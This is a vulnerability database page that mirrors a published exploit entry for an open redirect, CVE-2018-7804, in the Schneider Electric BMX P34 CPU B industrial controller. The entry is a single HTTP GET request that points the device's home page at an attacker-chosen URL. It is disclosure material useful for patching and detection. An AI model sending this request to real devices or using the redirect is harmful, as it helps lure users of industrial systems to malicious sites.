Schneider Electric BMX P34 CPU B Open Redirect

🗓️ 05 Nov 2018 00:00:00Reported by Ismail TasdelenType

packetstorm🔗 packetstormsecurity.com👁 254 Views

Schneider Electric BMX P34 CPU B hardware Open Redirect vulnerabilit

Reporter	Title	Published	Views	Family All 8
Tenable Nessus	Schneider Electric Modicon Multiple Controllers URL Redirection	8 May 201900:00	–	nessus
Tenable Nessus	Schneider-electric Modicom URL Redirection to Untrusted Site ('Open Redirect')	8 Nov 201900:00	–	nessus
Tenable Nessus	Schneider Electric Modicon Open Redirect (CVE-2018-7804)	7 Feb 202200:00	–	nessus
CVE	CVE-2018-7804	17 Dec 201822:00	–	cve
Cvelist	CVE-2018-7804	17 Dec 201822:00	–	cvelist
EUVD	EUVD-2018-19516	7 Oct 202500:30	–	euvd
NVD	CVE-2018-7804	17 Dec 201822:29	–	nvd
Prion	Design/Logic Flaw	17 Dec 201822:29	–	prion

`# Exploit Title: Schneider Electric BMX P34 CPU B - Unvalidated Redirects and Forwards  
# Date: 2018-07-21   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.schneider-electric.com/  
# Hardware Link : https://www.schneider-electric.com/en/product/BMXP342020/  
# Software : Schneider Electric BMXP342020  
# Product Version: BMX P34 CPU B  
# Vulernability Type : Unvalidated Redirects and Forwards  
# Vulenrability : Open Redirect  
# CVE : CVE-2018-7804  
  
# An Open Redirect security vulnerability has been discovered in the Schneider Electric BMX P34 CPU B hardware product.  
  
HTTP GET Request :  
  
GET /html/english/home/index.htm?http://TARGET HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
If-Modified-Since: TUE JAN 01 00:00:45 1980  
Cache-Control: max-age=0  
`

05 Nov 2018 00:00Current

EPSS0.00197